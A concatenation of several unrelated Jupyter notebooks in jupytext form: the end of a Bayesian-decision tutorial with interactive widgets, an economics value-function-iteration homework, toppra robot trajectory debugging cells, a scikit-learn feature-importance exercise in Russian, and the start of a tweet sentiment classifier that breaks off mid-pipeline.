# However, let's imagine we have a measurement from one of the variables, for example X, and we want to understand the uncertainty we have in Y. We no longer want to marginalize because we know X, we don't need to ignore it! Instead, we can calculate the conditional probability $P(Y|X=x)$. You will explore the relationship between these two concepts in the following interactive demo.
#
# But first, let's remember that we can also think about the amount of uncertainty as inversely proportional to the amount of information we have about each variable. This is important, because the joint information is determined by the correlation. For our Bayesian approach, the important intuition is that we can also think about the mutual information between the prior and the likelihood following a measurement.
#
#
#
#
#
# ### Interactive demo 4.2: Marginalizing 2D Gaussians
#
# Use the following widget to think consider the following questions:
#
# 1. When is the marginal distribution the same as the conditional probability distribution? Why?
# 2. If $\rho$ is large, how much information can we gain (in addition) looking at both variables vs just considering one?
# 3. If $\rho$ is close to zero, but the variances of the two variables are very different, what happens to the conditional probability compared to the marginals? As $\rho$ changes?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_marginal,
sigma1 = FloatSlider(min=0.1, max=1.1, step=0.01, value=0.5, description="σ_x", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=1.1, step=0.01, value=0.5, description="σ_y", continuous_update=False),
c_x = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="Cx", continuous_update=False),
c_y = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="Cy", continuous_update=False),
corr = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="ρ", continuous_update=False))
# +
# to_remove explanation
#. 1) The conditional probability distribution is using a measurement to restrict the likely value of
#. one of the variables. If there is correlation, this will also affect what we know (conditionally)
#. about the other! However, the marginal probability *only* depends on the direction along
#. which we are marginalizing. So, when the conditional probability is based on a measurement at the
#. means, it is the same as marginalization, as there is no additional information. A further note
#. is that we can also marginalize along other directions (e.g. a diagonal), but we are not exploring
#. this here.
#. 2) The larger the correlation, the more shared information. So the more we gain about the
#. second variable (or hidden state) by measuring a value from the other.
#. 3) The variable (hidden state) with the lower variance will produce a narrower
#. conditional probabilty for the other variable! As you shift the correlation, you will see
#. small changes in the variable with the low variance shifting the conditional mean of the
#. variable with the large variance! (So, if X has low variance, changing CY has a big effect.)
# -
# ---
# # Section 5: Bayes' theorem for continuous distributions
#
#
# ## Section 5.1: The Gaussian example
#
# Bayes' rule tells us how to combine two sources of information: the prior (e.g., a noisy representation of Ground Control's expectations about where Astrocat is) and the likelihood (e.g., a noisy representation of the Astrocat after taking a measurement), to obtain a posterior distribution (our belief distribution) taking into account both pieces of information. Remember Bayes' rule:
#
# \begin{eqnarray}
# \text{Posterior} = \frac{ \text{Likelihood} \times \text{Prior}}{ \text{Normalization constant}}
# \end{eqnarray}
#
# We will look at what happens when both the prior and likelihood are Gaussians. In these equations, $\mathcal{N}(\mu,\sigma^2)$ denotes a Gaussian distribution with parameters $\mu$ and $\sigma^2$:
# $$
# \mathcal{N}(\mu, \sigma) = \frac{1}{\sqrt{2 \pi \sigma^2}} \; \exp \bigg( \frac{-(x-\mu)^2}{2\sigma^2} \bigg)
# $$
#
#
# When both the prior and likelihood are Gaussians, Bayes Rule translates into the following form:
#
# $$
# \begin{array}{rcl}
# \text{Likelihood} &=& \mathcal{N}(\mu_{likelihood},\sigma_{likelihood}^2) \\
# \text{Prior} &=& \mathcal{N}(\mu_{prior},\sigma_{prior}^2) \\
# \text{Posterior} &=& \mathcal{N}\left( \frac{\sigma^2_{likelihood}\mu_{prior}+\sigma^2_{prior}\mu_{likelihood}}{\sigma^2_{likelihood}+\sigma^2_{prior}}, \frac{\sigma^2_{likelihood}\sigma^2_{prior}}{\sigma^2_{likelihood}+\sigma^2_{prior}} \right) \\
# &\propto& \mathcal{N}(\mu_{likelihood},\sigma_{likelihood}^2) \times \mathcal{N}(\mu_{prior},\sigma_{prior}^2)
# \end{array}
# $$
#
# We get the parameters of the posterior from multiplying the Gaussians, just as we did in Secton 2.2.
#
#
# ### Interactive Demo 5.1: Gaussian Bayes
# Let's consider the following questions using the following interactive demo:
#
# 1. For a Gaussian posterior, explain how the information seems to be combining. (Hint: think about the prior exercises!)
# 2. What is the difference between the posterior here and the Gaussian that represented the average of two Gaussians in the exercise above?
# 3. How should we think about the relative weighting of information between the prior and posterior?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_bayes,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False))
# +
# to_remove explanation
#. 1) We see that the posterior is a weighted average of the prior and likelihood,
#. where the weights correspond to the information in each (or inverse variance).
#. That is, if the prior has lower variance, the mean of the posterior is pulled
#. towards it. If the likelihood has lower variance, the mean of the posterior is
#. pulled towards it
#. 2) When we simply multiplied the Gaussians, we end up with an a true Probability
#. Density Function (PDF)--that is, the integral under the curve is one. However,
#. when we calculate the likelihood * prior, it will look like a Gaussian, but it
#. must be normalized by the marginal likelihood so that the posterior is a true
#. PDF.
#. 3) The prior and posterior can both be thought of as having information, as we
#. described earlier. So this means you can think of the weighting applied to each
#. as proportional to the amount of information each contain. For Gaussians, you
#. know how to calculate this directly.
# -
# ## Section 5.2: Exploring priors
#
# What would happen if we had a different prior distribution for Astrocat's location? Bayes' Rule works exactly the same way if our prior is not a Guassian (though the analytical solution may be far more complex or impossible). Let's look at how the posterior behaves if we have a different prior over Astrocat's location.
#
# Consider the following questions:
#
# 1. Why does the posterior not look Gaussian when you use a non-Gaussian prior?
# 2. What does having a flat prior mean?
# 3. How does the Gamma prior behave differently than the others?
# 4. From what you know, can you imagine the likelihood being something other than a Gaussian?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_prior_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians", "Uniform", "Gamma"],
value="Gaussian", description="Prior: "))
# +
# to_remove explanation
#. 1) If we do not use a Gaussian prior, we will not necessarily have a Gaussian
#. posterior as the type of posterior distribution depends on the types of both the
#. prior and likelihood distributions.
#. 2) A flat prior means you have no helpful prior information coming in: all options are
#. equally likely.
#. 3) The Gamma prior has skew, which is the property of not being symmetric, so, like the
#. mixture of Gaussians, it has different mean, median and mode. But unlike all the other
#. distributions, the Gamma PDF is positive only for x > 0, so it has a hard truncation,
#. even when its parameters cause the values just above x = 0 to be large. In fact, the
#. the Exponential distribution, Erlang distribution, and chi-square distribution are
#. special cases of the gamma distribution. In our example, you can see that the posterior
#. also incoreporates the hard truncation.
#. 4) We have only changed the prior, but the prior and the likelihood are just probability
#. distributions. In principle, they can be any properly defined probability distribution.
#. An example that may seem bizare is the Driac (delta) function, which is a PDF, that has
#. all it's probability density in one location, desite being continuous. But in the case
#. of the brain, it's possible that strange likelihood distributions could be used. However,
#. for the same reasons we, as scientists, like exponential family distributions, it may be
#. that evolution selected only ways of representing probability distributions that had useful
#. properties.
# -
# ---
# # Section 6: Bayesian decisions
#
#
# ## Section 6.1: Bayesian estimation on the posterior
#
# Now that we understand that the posterior can be something other than a Gaussian, let's revisit **Loss** functions. In this case, we can see that the posterior can take many forms.
#
#
# ### Interactive Demo 6.1: Standard loss functions with various priors
#
# Questions:
#
# 1. If we have a bi-modal prior, how do the different loss functions potentially inform us differently about what we learn?
# 2. Why do the different loss functions behavior differently with respect to the shape of the posterior? When do they produce different expected loss?
# 3. For the mixture of Gaussians, describe the situations where the expected loss will look different from the Gaussian case.
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_bayes_loss_utility_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians", "Uniform", "Gamma"],
value="Gaussian", description="Prior: "))
# +
# to_remove explanation
# 1. The minimium of the different loss functions correspond to the mean, median,
#. and mode of the posterior (just as in Interactive Demo 3). If we have a bi-modal
#. prior, those properties of the posterior can be distinct.
#. 2. The posterior is just another probability distribution, so all the properies we
#. saw in Interactive Demo 3, are true of the posterior two—-even though in this case,
#. the posterior inherited the non-symetric properties from the prior. So, in this
#. example, any prior that itself has a different mean, median and mode with also
#. produce differents across their equivilant Loss functions.
#. 3. As long as the posterior probability densities are symetric around the true mean
#. (hidden state), the MSE and ABS loss functions will look the same as for a Gaussian
#. prior. The mean and the median are the same for symetric distributions. (When the
#. mean exists--look up the Cauchy distributions.) The mode will be the same as the
#. mean and median, when the distribution is unimodal (and therefor when the mixture
#. means are the same. There can also be two modes with the mixture prior!
# -
# ## Section 6.2: Bayesian decisions
#
# Finally, we can combine everything we have learned so far!
#
# Now, let's imagine we have just received a new measurement of Astrocat's location. We need to think about how we want to decide where Astrocat is, so that we can decide how far to tell Astrocat to move. However, we want to account for the satellite and Space Mouse location in this estimation. If we make an error towards the satellite, it's worse than towards Space Mouse. So, we will use our more complex utility function from Section 3.2.
#
# ### Interactive Demo 6.2: Complicated cat costs with various priors
#
#
# Questions:
#
# 1. If you have a weak prior and likelihood, how much are you relying on the utility function to guide your estimation?
# 2. If you get a good measurement, that is a likelihood with low variance, how much does this help?
# 3. Which of the factors are most important in making your decision?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_gain", continuous_update=False),
mu_c = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_cost", continuous_update=False),
sigma_g = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_gain", continuous_update=False),
sigma_c = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_cost", continuous_update=False),
plot_utility_row=fixed(True))
# +
# to_remove explanation
# 1) When you have a weak prior and likelihood (high variance for both so not
#. informative), the utility function heavily dictates the shape of the expected utility
#. and final decision (the location of the max of the expected utility)
# 2) How much it helps guide your decision depends on the prior and utility function.
#. If the likelihood is much more informative that the prior (lower variance), it
#. will help clarify your decision of location quite a bit.
# 3) None are always the "most important". It depends on the interplay of all components,
#. especially the information of the prior and likelihood. If you have an informative
#. prior, that will heavily influence the posterior and thus the expected utility.
#. If you have an informative likelihood, that will drive the posterior. And if neither
#. is informative, the utility function becomes very important,
# -
# ---
# # Summary
#
# In this tutorial, you extended your exploration of Bayes Rule and the Bayesian approach in the context of finding and choosling a location for Astrocat.
#
# Specifically, we covered:
#
# * The Gaussian distribution and its properties
#
# * That the likelihood is the probability of the measurement given some hidden state
#
# * Information shared between Gaussians (via multiplication of PDFs and via two-dimensional distributions)
#
# * That how the prior and likelihood interact to create the posterior, the probability of the hidden state given a measurement, depends on how they covary
#
# * That utility is the gain from each action and state pair, and the expected utility for an action is the sum of the utility for all state pairs, weighted by the probability of that state happening. You can then choose the action with highest expected utility.
#
|
tutorials/W3D1_BayesianDecisions/W3D1_Tutorial2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# initial
import time
import numpy as np
z_vec = np.array([1, 2, 5])
z_num = len(z_vec)
z_pdf = np.array([[0.9, 0.05, 0.05],
[0.1, 0.8, 0.1],
[0.15, 0.15, 0.7]])
k_min, k_max, k_num = 0, 50, 250
k_vec = np.linspace(k_min, k_max, k_num)
k_mat = k_vec.reshape(k_num, 1) @ np.ones((1, k_num))
shape = (k_num, z_num)
def vfi(θ=0.6, δ=0.15, β=0.95, p=0.1):
time_begin = time.time()
v_old = np.ones(shape)
v_new = np.zeros(shape)
v_tol = 1e-5
v_ctr = 0
policy = np.zeros(shape, dtype="int")
while np.max(np.abs(v_old - v_new)) > v_tol:
v_old = np.copy(v_new)
for z_curr in range(z_num):
v_expected = z_pdf[z_curr, :] @ v_old.T
π = z_vec[z_curr] * (k_mat ** θ)
d = π + p * (1 - δ) * k_mat - p * k_mat.T
d[d < 0] = -1e10
v_new[:, z_curr] = np.max(d + β * v_expected, 1)
policy[:, z_curr] = np.argmax(d + β * v_expected, 1)
v_ctr += 1
time_end = time.time()
# print("price ::", p)
# print("v_ctr ::", v_ctr)
# print("time ::", time_end - time_begin)
return policy, v_new
def eq(policy):
shape = policy.shape
μ_old = np.zeros(shape)
μ_new = np.ones(shape) / (k_num * z_num)
μ_tol = 1e-5
μ_ctr = 0
while np.max(np.abs(μ_old - μ_new)) > μ_tol:
μ_old = np.copy(μ_new)
μ_new = np.zeros(shape)
for k_curr in range(k_num):
for z_curr in range(z_num):
k_next = policy[k_curr, z_curr]
μ_new[k_next, :] += μ_old[k_curr, z_curr] * z_pdf[z_curr]
μ_ctr += 1
return μ_new
p_h = 50
p_l = 1e-3
p_tol = 1e-5
p_ctr = 0
while p_h - p_l > p_tol:
p_guess = (p_h + p_l) / 2
policy, v_new = vfi(p=p_guess)
μ_invar = eq(policy)
k_demand = np.sum(np.sum(μ_invar, 1) * k_vec)
# print(policy)
# print(μ_invar)
if k_demand > 10:
p_l = p_guess
else:
p_h = p_guess
p_ctr += 1
print("=" * 20)
print("p_guess ::", p_guess)
print("k_demand ::", k_demand)
print("p_ctr ::", p_ctr)
# price = 2.567995539784431
# +
import matplotlib.pyplot as plt
fig, [ax1, ax2] = plt.subplots(nrows=1, ncols=2, figsize=[10, 5], sharex=True)
ax1.plot(v_new)
ax1.set_title("value function")
ax2.plot(policy)
ax2.set_title("policy function")
plt.show()
# +
z_vec = np.array([1, 2, 4])
p_h = 50
p_l = 1e-3
p_tol = 1e-5
p_ctr = 0
while p_h - p_l > p_tol:
p_guess = (p_h + p_l) / 2
policy, v_new = vfi(p=p_guess)
μ_invar = eq(policy)
k_demand = np.sum(np.sum(μ_invar, 1) * k_vec)
# print(policy)
# print(μ_invar)
if k_demand > 10:
p_l = p_guess
else:
p_h = p_guess
p_ctr += 1
print("=" * 20)
print("p_guess ::", p_guess)
print("k_demand ::", k_demand)
print("p_ctr ::", p_ctr)
# price = 2.2654960967302324
|
homework - 3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import toppra.dracula as drac
import toppra as ta
import toppra.algorithm as algo
from toppra import constraint
# +
import re
import ast
import numpy as np
def parse_str_arr(s):
a = re.sub(r"([^[])\s+([^]])", r"\1, \2", s)
return np.array(ast.literal_eval(a))
# -
waypts = np.loadtxt('test_waypts_4.txt')
coeff = 1
vlim = coeff * np.vstack([-V_MAX, V_MAX]).T
alim = coeff * np.vstack([-A_MAX, A_MAX]).T
min_pair_dist, t_sum = _check_waypoints(waypts, vlim)
t_sum
N_samples = waypts.shape[0]
min_pair_dist, t_sum = _check_waypoints(waypts, vlim)
x = np.linspace(0, 0.15, N_samples) # magic number
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation
)
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
# gridpoints=gridpoints,
solver_wrapper="seidel",
)
jnt_traj = instance.compute_trajectory(0, 0)
jnt_traj.cspl.x
cs = jnt_traj.cspl
x = cs.x
vlim = vlim[:, 1]
vlim
(np.abs(cs.derivative(1)(x))/vlim > 1).any()
data = np.load('/data/toppra/20201204T175646.794406+0000.npz')
waypts = data['waypts']
vlim = data['vlim']
alim = data['alim']
vmax = vlim[:, 1]
amax = alim[:, 1]
waypts = np.array([
[ 0.1088, -1.5201, 1.1266, -2.6961, 1.1851, 1.5092, -1.8498],
[-0.5517, -0.5657, 1.7334, -1.8182, 0.5651, 1.5971, -1.1968],
])
vmax = np.array([0.54375, 0.54375, 0.54375, 0.54375, 0.6525, 0.6525, 0.6525])
amax = np.array([ 3.75, 1.875, 2.5, 3.125, 3.75, 5, 5])
vlim = np.vstack([-vmax, vmax]).T
alim = np.vstack([-amax, amax]).T
cs = RunTopp(waypts, vlim, alim, return_cs=True, verify_lims=True)
order = 1
lim = vlim*0.893
deriv = cs.derivative(order)(cs.x)
deriv[13, 1] *= -1 # debug
i, j = np.where(~((lim[:, 0] < deriv) & (deriv < lim[:, 1])))
signed_lim = np.where(deriv > 0, lim[:, 1], lim[:, 0])
excess = np.sign(deriv) * (deriv - signed_lim) # want the +ve entries
excess_percent = excess / np.abs(signed_lim) # want +ve entries
(np.sign(deriv) * (deriv - signed_lim))[13]
(deriv - signed_lim)[13]
lim
vmax - np.abs(cs.derivative(1)(cs.x))[21,:]
cs = RunTopp(waypts, vlim, alim, return_cspl=True)
new_waypts = cs(cs.x)
new_waypts.shape
new_cs = RunTopp(new_waypts, vlim, alim, return_cspl=True)
# ### crt jnt test
from toppra.dracula import run_topp_spline, _find_waypts_indices
import numpy as np
data = np.load('/data/toppra/input_data/20210114T160131.877605+0000.npz')
waypts_jnt = data['waypts']
vlim_jnt = data['vlim']
alim_jnt = data['alim']
data = np.load('/data/toppra/input_data/20210114T160131.958179+0000.npz')
waypts_crt = data['waypts']
vlim_crt = data['vlim']
alim_crt = data['alim']
cs_jnt = run_topp_spline(
waypts_jnt,
vlim_jnt,
alim_jnt,
verify_lims=True,
return_cs=True,
)
cs_crt = run_topp_spline(
waypts_crt,
vlim_crt,
alim_crt,
verify_lims=True,
return_cs=True,
)
idx_jnt = _find_waypts_indices(waypts_jnt, cs_jnt)
# +
waypts = waypts_jnt
cs = cs_jnt
idx = np.zeros(waypts.shape[0], dtype=int)
k = 0 # index for knots, scan all knots left to right, start at the 0th
for i, waypt in enumerate(waypts):
print(f'checking waypt {i}')
waypt_min_err = float("inf") # always reset error for current waypt
while k < cs.x.size:
print(f'current k: {k}')
err = np.linalg.norm(cs(cs.x[k]) - waypt)
if err <= waypt_min_err + (i > 0) * 2e-3:
print(f'keeping going right, current err {err}')
waypt_min_err = err
else: # we've found the closest knot at the previous knot, k-1
idx[i] = k - 1
print(f'found higher err: {err}, diff: {err-waypt_min_err}, set idx[{i}] = {k-1}')
break
k += 1
idx[i] = k - 1
assert idx[0] == 0, "The first knot is not the beginning waypoint"
assert all(
idx[1:] != 0
), "Failed to find all original waypoints in CubicSpline"
assert idx[-1] == cs.x.size - 1, "The last knot is not the ending waypoint"
# -
# ### debug
# +
waypts_str ='''[[-5.13672496e-21 2.17090011e+00 1.97420001e+00 -1.33614886e+00
1.68947875e+00 -1.43582082e+00 -1.25112307e+00 7.89370894e-01
1.47137129e+00 1.02121091e+00]
[-3.32828831e-09 2.17275190e+00 1.97231507e+00 -1.33659756e+00
1.68829679e+00 -1.43437290e+00 -1.25026381e+00 7.85554409e-01
1.47030544e+00 1.02154922e+00]
[-5.00686888e-08 2.19915652e+00 1.94552147e+00 -1.34293866e+00
1.67151368e+00 -1.41380286e+00 -1.23804998e+00 7.31321335e-01
1.45512831e+00 1.02636683e+00]
[-1.51639455e-07 2.25779486e+00 1.88627732e+00 -1.35684395e+00
1.63446021e+00 -1.36836183e+00 -1.21104920e+00 6.11465275e-01
1.42149162e+00 1.03704500e+00]
[-3.03510689e-07 2.34875226e+00 1.79503691e+00 -1.37796271e+00
1.57753944e+00 -1.29848599e+00 -1.16947937e+00 4.27032262e-01
1.36948764e+00 1.05355692e+00]
[-4.78252105e-07 2.46180892e+00 1.68324935e+00 -1.40310061e+00
1.50815940e+00 -1.21314013e+00 -1.11858237e+00 2.01450363e-01
1.30527341e+00 1.07395291e+00]
[-5.95908773e-07 2.55269051e+00 1.59602475e+00 -1.42149901e+00
1.45461607e+00 -1.14698601e+00 -1.07892489e+00 2.60696374e-02
1.25434577e+00 1.09014034e+00]
[-6.31483317e-07 2.61303782e+00 1.54313195e+00 -1.43027127e+00
1.42328405e+00 -1.10777235e+00 -1.05507600e+00 -7.89981931e-02
1.22196949e+00 1.10044014e+00]
[-5.83632527e-07 2.64353275e+00 1.52495861e+00 -1.42886245e+00
1.41445374e+00 -1.09627032e+00 -1.04788053e+00 -1.12447031e-01
1.20893061e+00 1.10451031e+00]
[-4.30989161e-07 2.65223694e+00 1.54129899e+00 -1.41384876e+00
1.42881119e+00 -1.11507499e+00 -1.06058168e+00 -7.15113729e-02
1.21707821e+00 1.10131919e+00]
[-3.04006875e-07 2.66843677e+00 1.55857241e+00 -1.39506161e+00
1.44321787e+00 -1.13976073e+00 -1.08208919e+00 -2.32865438e-02
1.23451877e+00 1.09397626e+00]
[-2.62020137e-07 2.71521425e+00 1.55118251e+00 -1.37953508e+00
1.44117415e+00 -1.15030921e+00 -1.10065782e+00 -2.01057959e-02
1.24736989e+00 1.08688331e+00]
[-2.06513036e-07 2.79397821e+00 1.53620076e+00 -1.35511065e+00
1.43577600e+00 -1.16541350e+00 -1.13006961e+00 -2.07504742e-02
1.26745081e+00 1.07552099e+00]
[-1.14120589e-07 2.88239980e+00 1.52467299e+00 -1.32411373e+00
1.43375051e+00 -1.18797719e+00 -1.16710234e+00 -8.90599750e-03
1.29344857e+00 1.06146646e+00]
[-3.92676220e-08 2.94131780e+00 1.51934671e+00 -1.30186725e+00
1.43419385e+00 -1.20551252e+00 -1.19357443e+00 4.58445167e-03
1.31232250e+00 1.05151761e+00]
[-3.08850145e-09 2.96830320e+00 1.51724136e+00 -1.29145217e+00
1.43465161e+00 -1.21389806e+00 -1.20595300e+00 1.15570463e-02
1.32118571e+00 1.04687870e+00]
[ 5.83989512e-22 2.97048521e+00 1.51709998e+00 -1.29059041e+00
1.43471062e+00 -1.21460688e+00 -1.20697606e+00 1.21896211e-02
1.32192147e+00 1.04649639e+00]]'''
vlim_str='''[[-99. 99. ]
[ -2.475 2.475 ]
[ -2.475 2.475 ]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.15325 2.15325]
[ -2.5839 2.5839 ]
[ -2.5839 2.5839 ]
[ -2.5839 2.5839 ]] '''
alim_str='''[[-85. 85. ]
[ -3.4 3.4 ]
[ -3.4 3.4 ]
[-12.75 12.75 ]
[ -6.375 6.375]
[ -8.5 8.5 ]
[-10.625 10.625]
[-12.75 12.75 ]
[-17. 17. ]
[-17. 17. ]] '''
# -
waypts = parse_str_arr(waypts_str)
vlim = parse_str_arr(vlim_str)
alim = parse_str_arr(alim_str)
np.savetxt('/src/toppra/tests/dracula/test_waypts_jnt_7.txt', waypts)
import numpy as np
data = np.load('/data/toppra/input_data/20210303T182518.144079+0000.npz')
waypts = data['waypts']
vlim = data['vlim']
alim = data['alim']
from toppra.dracula import run_topp_spline, _check_waypts, run_topp_const_accel
cs = run_topp_spline(waypts, vlim, alim, return_cs=True)
cs = run_topp_const_accel(waypts, vlim, alim)
pair_dist = np.diff(waypts, axis=0) # (N-1, N_dof)
i_sign_flip = ( # find where it changes direction
np.where(np.sign(pair_dist[:-1]) != np.sign(pair_dist[1:]))[0] + 1
)
pair_t = np.abs(pair_dist) / vlim[:, 1]
pair_t[i_sign_flip] = np.sqrt( # assume 0 velocity start at max accel
2 * np.abs(pair_dist)[i_sign_flip] / alim[:, 1]
)
t_sum = pair_t.max(axis=1).sum()
min_pair_dist = np.linalg.norm(pair_dist, axis=1).min()
t_sum
instance.path.duration
A_LIM_EPS = 0.07
V_LIM_EPS = 0.12
pc_acc = constraint.JointAccelerationConstraint(
alim - np.sign(alim) * A_LIM_EPS,
discretization_scheme=constraint.DiscretizationType.Interpolation,
)
pc_vel = constraint.JointVelocityConstraint(
vlim - np.sign(vlim) * V_LIM_EPS
)
x = np.linspace(0, 0.03*t_sum, waypts.shape[0])
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
solver_wrapper="seidel",
parametrizer="ParametrizeSpline",
)
traj = instance.compute_trajectory(0, 0)
traj.duration
A_LIM_EPS = 0.07
V_LIM_EPS = 0.12
pc_acc = constraint.JointAccelerationConstraint(
alim - np.sign(alim) * A_LIM_EPS,
discretization_scheme=constraint.DiscretizationType.Interpolation,
)
pc_vel = constraint.JointVelocityConstraint(
vlim - np.sign(vlim) * V_LIM_EPS,
)
x = np.linspace(0, 0.5*t_sum, waypts.shape[0])
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
solver_wrapper="seidel",
parametrizer="ParametrizeConstAccel",
gridpt_min_nb_points=1000, # ensure eps ~ O(1e-2)
)
traj = instance.compute_trajectory(0, 0)
# + tags=[]
np.savetxt('/src/toppra/tests/dracula/test_waypts_jnt_6.txt', waypts)
# -
V_MAX = np.array([2.1750, 2.1750, 2.1750, 2.1750, 2.6100, 2.6100, 2.6100])
A_MAX = np.array([15, 7.5, 10, 12.5, 15, 20, 20])
|
tests/dracula/spline_tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Тема “Обучение с учителем”
#
# ### *Задание 3
# Вызовите документацию для класса RandomForestRegressor,
# найдите информацию об атрибуте feature_importances_.
# С помощью этого атрибута найдите сумму всех показателей важности,
# установите, какие два признака показывают наибольшую важность.
#
# +
import pandas as pd
import numpy as nm
from sklearn.datasets import load_boston
BP = load_boston()
X = pd.DataFrame(BP.data, columns=BP.feature_names)
y = pd.DataFrame(BP.target, columns=['price'])
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
from sklearn.ensemble import RandomForestRegressor
model = RandomForestRegressor(n_estimators=1000, max_depth=12, random_state=42)
model.fit(X_train, y_train.values[:,0])
# -
# ?RandomForestRegressor
# >**feature_importances_** : ndarray of shape (n_features,)
# The impurity-based feature importances.
# The higher, the more important the feature.
# The importance of a feature is computed as the (normalized)
# total reduction of the criterion brought by that feature. It is also
# known as the Gini importance.
# Warning: impurity-based feature importances can be misleading for
# high cardinality features (many unique values). See
# :func:`sklearn.inspection.permutation_importance` as an alternative.
model.feature_importances_
s=pd.Series(model.feature_importances_, index=BP.feature_names)
s
s[s>0.3]
X.RM.value_counts().count() / X.RM.count()
X.LSTAT.value_counts().count() / X.LSTAT.count()
# **Признаки имеют высокий процент уникальности (90%), что может повлиять на алгоритмы модели RandomForestRegressor**
# >:Attribute Information (in order):
# - RM average number of rooms per dwelling
# - LSTAT % lower status of the population
#
X.RM.describe()
X.LSTAT.describe()
# **Признаки RM (average number of rooms per dwelling) и LSTAT (lower status of the population) показывают наибольшую важность.**
|
homeworks/les05/tlearn05-03.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Required libraries
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from textblob import TextBlob
import re
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
from sklearn.metrics import confusion_matrix, classification_report,accuracy_score
# ## Reading and Extracting data from .csv files
train_tweets = pd.read_csv('train_tweets.csv')
test_tweets = pd.read_csv('test_tweets.csv')
train_tweets = train_tweets[['label','text']]
test = test_tweets['text']
# ## Exploratory Data Analysis
train_tweets['length'] = train_tweets['text'].apply(len)
fig1 = sns.barplot('label','length',data = train_tweets,palette='PRGn')
plt.title('Average Word Length vs label')
plot = fig1.get_figure()
plot.savefig('Barplot.png')
fig2 = sns.countplot(x= 'label',data = train_tweets)
plt.title('Label Counts')
plot = fig2.get_figure()
plot.savefig('favour-againt-count-Plot.png')
# ## Feature Engineering
def text_processing(tweet):
#Generating the list of words in the tweet (hastags and other punctuations removed)
def form_sentence(tweet):
tweet_blob = TextBlob(tweet)
return ' '.join(tweet_blob.words)
new_tweet = form_sentence(tweet)
#Removing stopwords and words with unusual symbols
def no_user_alpha(tweet):
tweet_list = [ele for ele in tweet.split() if ele != 'user']
clean_tokens = [t for t in tweet_list if re.match(r'[^\W\d]*$', t)]
clean_s = ' '.join(clean_tokens)
clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords.words('english')]
return clean_mess
no_punc_tweet = no_user_alpha(new_tweet)
#Normalizing the words in tweets
def normalization(tweet_list):
lem = WordNetLemmatizer()
normalized_tweet = []
for word in tweet_list:
normalized_text = lem.lemmatize(word,'v')
normalized_tweet.append(normalized_text)
return normalized_tweet
return normalization(no_punc_tweet)
train_tweets['tweet_list'] = train_tweets['text'].apply(text_processing)
test_tweets['tweet_list'] = test_tweets['text'].apply(text_processing)
train_tweets[train_tweets['label']==1].drop('text',axis=1).head()
# ## Model Selection and Machine Learning
X = train_tweets['text']
y = train_tweets['label']
test = test_tweets['text']
from sklearn.model_selection import train_test_split
msg_train, msg_test, label_train, label_test = train_test_split(train_tweets['text'], train_tweets['label'], test_size=0.2)
#Machine Learning Pipeline
pipeline = Pipeline([
